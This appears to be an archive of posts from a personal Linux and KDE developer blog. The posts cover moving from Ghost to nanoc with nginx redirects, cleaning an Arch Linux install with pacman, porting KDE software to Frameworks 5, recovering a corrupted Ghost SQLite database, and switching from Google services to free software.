Someday ago I thought it was time to merge my website and my blog; both could be handled by a static site generator and since I’m fluent in Ruby more then Haskell, I went for nanoc again.

The migration has not been hard because one of the main features of Ghost is that you write your post using Markdown, then I wrote this shell script to migrate my posts from Ghost to a “nanoc compatible format” like:

---
kind: article
created_at: 2015-10-06
title: My Ghost Post
tags: ['example']
---
This is a post in **Ghost**!

With that script my posts were split and ready in the content folder to be built by nanoc. Nothing more to do! Well, in truth I had to fix the path to the linked images manually…

The second step was to put some redirect to allow the old links around the web to continue to work, specifically the Ghost pattern was http://blog.as.it/my-ghost-post/ while in nanoc I went for /posts/my-ghost-post.html. I fixed this in my blog nginx configuration:

location = / {
  rewrite ^ $scheme://www.andreascarpino.it permanent;
}

location / {
  rewrite ^(.*) $scheme://www.andreascarpino.it/posts$request_uri permanent;
}

location = /rss/ {
  rewrite ^ $scheme://www.andreascarpino.it/feed.xml permanent;
}

While in the website nginx configuration I put:

location /posts/ {
  root   /srv/http/website;
  if ($request_filename ~* ^.+.html$) {
    break;
  }
  if ($request_uri ~* ^.+/$) {
    rewrite ^/(.*)/$ /$1.html permanent;
  }
}

And that’s!

Hope this helps someone that plans to do the same migration. If you are interested at looking at my nanoc setup, the configuration is here.

KDE Telepathy ThinkLight Plugin

2015-09-12T00:00:00Z

Do you own a ThinkPad? Good! Does it have the ThinkLight? Good! Then this post might interest you!

I just wrote a KDE Telepathy plugin that blinks the ThinkLight when you get an incoming message. Sounds almost useless, isn’t? Maybe not.

I found a good use case for it: sometime you could be away from keyboard, but near your ThinkPad (e.g. studying), the screen goes black, sounds are off, but you see the ThinkLight blinking - you got a message!

To enable it you just have to fetch the source code, build and install as usual with CMake.

There’s just an annoyance at the moment: you need write permission over /proc/acpi/ibm/light. I’m looking for a solution for this, but found nothing if not changing that file permissions manually. Any idea?

There’s also a tool, thinkalert (mirror), which allows to turn on/off the ThinkLight without being root by using suid. If you prefer this way, you can fetch the code from the thinkalert branch instead.

Have fun!

Cleaning an Arch Linux installation

2015-06-06T00:00:00Z

We are in springtime and usually in springtime you make some cleaning. Today I decided to clean my old desktop that is running the same Arch Linux installation since 2007.

Warning: this whole task requires a bit of knowledge about what a package does and why it is installed on your system. You could break something, but IMHO in the worst case you will re-install it later ;-)

So, I started by listing any package I didn’t install:

$ pacman -Sqg base base-devel | sort -u > /tmp/essentials
$ pacman -Qqe | sort > /tmp/explicit
$ comm -13 /tmp/essentials /tmp/explicit > /tmp/unknown

Read /tmp/unknown and mark as “installed as dependence” any package you didn’t install or simply you don’t know. This last step requires a knowledge of what a package do; pacman -Qi and pacman -Ql are your friend here! To mark a package as dependence run: # pacman -D --asdeps <pkg>.

Now, the harmful part! Run # pacman -Rscn $(pacman -Qqtd). It will remove any package installed as dependence plus the packages needed by it because installed as dependence that are no more required without it. Do not rush and read the packages you are going to remove!

In my case, even after all those years I only got 14 packages…I’m too careful. I always mark as dependence the package I don’t use anymore and I periodically check the output of pacman -Qqtd.

Now, you could also remove the orphaned files on your system by using lostfiles (download from AUR). In fact, # lostfiles relaxed > /tmp/lostfiles will produce a list of files that are owned by no package, but it also excludes something from that list which makes things easier for your brain.

Update: an user suggested to also check the output of pacman -Qqttd (note the extra ‘t’); this one also lists optional dependencies. Thanks!

Happy cleaning!

Choqok and KDE Frameworks

2015-04-08T00:00:00Z

Hi there,

Good news for the Choqok users out there: we are now using KDE Frameworks technology!

In fact, I spent the last month porting Choqok bits from Qt 4 to Qt 5, but I also fixed minor bugs you discover when doing this kind of work. Regressions could happen, so please report them and we’ll fix them!

To try this version you just need to install qca-qt5 and qoauth-qt5, build our code from git and you have done. Check the README for more info about the steps on how to build it.

…and from now on I’ll focus on fixing bugs \o/

I’m also interested in improving Pump.io and GNU Social support because I’m a supporter and advocate of the Free Software, but I also believe in the FreeYourData movement and decentralized social networks are the way to go.

Before someone ask, I’m also a Diaspora* supporter, but Choqok cannot support it until they get some API.

Firefox KDE Wallet for KF5

2015-01-10T00:00:00Z

Hi there,

I have a good news for Firefox and Plasma 5 users: I ported KDE Wallet password integration extension to KDE Frameworks 5!

It seems to me that this plugin is unmaintained because both the released version and the SVN one do not support Firefox 33 or newer. So, as first step I took Guillermo’s code and bumped the Firefox version.

After that I did work on the KF5 version: I updated the CMakeLists file, replaced some kDebug() usage and fixed the QString initializations. The plugin built at first shot!

And then the first issue.

There’s a C test file which failed to find the exported symbols from the C++ library, therefore the extension would not work in Firefox. Turns out Q_DECL_EXPORT macro was needed. I guess with Qt 5 you need to explicitly define which symbols to export?

Rebuilt, the plugin runs and… segfaults. After some debugging it turns out KWallet::openWallet() invokes KWindowSystem that needs a QCoreApplication instance otherwise it segfaults.

Fixed that one, I rebuilt the plugin and… it works!

The code is here, and here you can download an XPI for x86_64. Try it!

In the meantime, I’m going to clean it a bit.

How I lost my blog content

2014-08-20T00:00:00Z

…and, luckily, how I restored it!

Let me say this before you start reading: backup your data NOW!!!

Really, do it. I post-poned this for so long and, as result, I had a drammatic weekend.

Last Friday I had the wonderful idea to update my Ghost setup to the newer 0.5. I did this from my summer house via SSH, but the network isn’t the culprit here.

You have to know that some months ago, maybe more, I switched from a package installation, through this PKGBUILD, to an installation via npm. So, as soon as I typed npm update, all my node_modules/ghost content was gone. Yep, I must be dumb.

After some minute, which helped me to better understand how the situation was, I immediately shutdown the BeagleBone Black.

The day after I went home, I installed Arch Linux ARM on a microSD and obviously the super TestDisk which got SQLite support since a while now. Cool!

This way I restored the Ghost database, BUT it was corrupted. However, a StackOverflow search pointed me to this commad:

cat <( sqlite3 ghost.db .dump | grep "^ROLLBACK" -v ) <( echo "COMMIT;" ) | sqlite3 ghost-fixed.db

After that, I was able to open the database and to restore 14 of 40 posts.

My second attempt has been to use the Google cache. Using this method I recovered about 10 posts. Nice, I already had more than 50% of the total content! I was feeling optimistic.

The Arch Linux Planet let me recover 3 posts more, which however I could recover anyway using Bartle Doo; I never heard of this website before, but thanks to it I recovered some posts by looking for my First and Last Name.

I was almost here. About 10 posts missing, but how to recover them?? I didn’t remember titles and googling without specific keywords didn’t help neither.

I went back on the broken SQLite database, Vim can open it so let’s look into for some data. Bingo! The missing posts titles are still there!

And then I started googling again, but for specific titles, which pointed me to websites mirroring my posts content. At the end of this step I had 38 of 40 posts!

I can’t stop now, it’s more than a challenge now.

I went back again on the broken database where posts content is corrupted: there’s some text, then symbols and then another text which doesn’t make any sense in union with the first part. This looks like a tedious job. This Saturday can end here.

It’s Sunday; I’m motivated and I can’t lose those 2 posts because of my laziness. I’ve the missing posts titles and I now remember their content, so I started to look for their phrases in the database and, with all my surprise and a lot of patience, I recovered their content! This mainly because Ghost keeps both the markdown and the HTML text in the database and then the post content is duplicated which decrease the chance of a corruption in the same phrase.

Another summer, another Linux survival experience (that I’m pleased to link to!).

Bringing back my data

2014-06-24T00:00:00Z

The past days have been very “FLOSS” for me.

Let’s start from the beginning: Tuesday I managed (= it means I found money) to became a supporter of the FSFE! This is something that I had in mind since the last Linux Day (I’m sorry, that post is in Italian!) because I meet the FSFE Bari guys there and we had a nice chat.

I already knew the FreeYourAndroid campaign, but on Thursday I stumbled upon Nikon Roussos’ post and he really motivated me to start replacing closed app with FLOSS app on my phone.

Thanks to F-Droid, after some hour I realized there’s a good FLOSS alternative for almost every application I use. Notably, I switched from Navigator to OsmAnd~, from Google Keep to Mirakel, from Google Translator to QuickDic, from Google Hangout (SMS) to TextSecure, from Twitter to Twidere.

Luckily I was already using Apollo, ConnectBot, Document Viewer, KeePassDroid, Barcode Scanner, Diode, Episodes…

The list was not so short as I thought initially and this scared me because there were too many Google apps. Yes, that’s because it has the best services out there, but this means it had my location, my SMSs, my todos, my translations, my mails, my contacts, my events,… even my website stats! - I bet Google knows me better than I do.

On Monday, next step was to move away from Google Analytics. I did a quick search and found Piwik. The setup was simple and faster and it even allows (through a third-party script) to import your data from Google Analytics.

Tuesday. It was time to remove the Dropbox client and switch to ownCloud. I never really used Dropbox to store my private files, I just did install the client because others co-workers did and we needed a quick way to work on a folder at the same time. Luckily I don’t have to share a folder with co-workers anymore, and even if I had I would use the website instead - Yep, downloading and uploading the file every time.

I used this day to remove that package from my system and setup an ownCloud server that I’m using for remote backups. Now I can put my private files on the cloud because I trust the service this time :-)

Only GMail and Google+ left and then I free-ed my Android.

Google+ is harder. I don’t want to quit Google+ because of the FLOSS development around it. It’s a great place where to look for FLOSS news, look for people reactions and even people issues. It’s a real pity Pump.IO or even Diaspora aren’t at the same level. However, I always publish my staff as ‘Public’ audience, so Google doesn’t really own anything.

On the contrary, GMail is a bit easier because I already use my aliases everywhere so I just need to open a Kolab account and update my forwarding rules. However we’re all Gmail users now.

Let me say that I don’t want to quit every closed service and use my own instance (it would be cool, but you know it isn’t realistic), instead I guess we should look for a FLOSS alternative first and in the case there’s none we could split our data between many companies…and start making the FLOSS implementation!

Oh I almost forgot, keep an eye upon the Tox Project! It’s the free alternative to Skype/Hangout.

FLOSS <3

KF5 Official Packages for Arch

2014-05-17T00:00:00Z

Hi everybody,

This morning I uploaded last KDE Framework 5 packages to the [extra] repository in Arch Linux.

Since Beta 2, KF5 packages are co-installable with KDE 4 and for this reason those packages are built with the /usr prefix, not /opt/kf5 as previously on AUR.

The only exception here was kactivities: both versions (the KDE 4 version and the KDE Framework one) ship a kactivitymanagerd binary.

Thanks to Ivan Čukić tip both kactivities packages have been split between binary and libraries. In fact, Ivan told me KDE 4 needs kactivities 4.x libraries, but it works with kactivitymanagerd ship by kactivities from KDE Frameworks.

For this reason kactivities4 and kactivities-framework Arch Linux packages provide a kactivities virtual package which allows KDE 4 users to install KDE Framework 5 on the same system under /usr.

The packages are part of two groups to simplify installation: kf5 and kf5-aids (PortingAids).

Plasma Next packages will (hopefully!) follow in the next days, but they will go in [kde-unstable] instead. Also, their prefix will be /opt/kf5 so they are co-installable.

Happy pacman -S kf5 kf5-aids and enjoy KDE Frameworks libraries!

PS: KWin 5 is already in [kde-unstable]!

UPDATE: I’ve been asked several times now, so here are the instructions on how to run Plasma Next components, e.g. KWin 5:

# pacman -S kwin oxygen $ export KF5=/opt/kf5 $ export QML2_IMPORT_PATH=$KF5/lib/qt/qml:/usr/lib/qt/qml $ export QT_PLUGIN_PATH=$KF5/lib/qt/plugins:/usr/lib/qt/plugins $ export XDG_CONFIG_DIRS=$KF5/etc/xdg:/etc/xdg $ export PATH=$KF5/bin:$PATH $ kwin --replace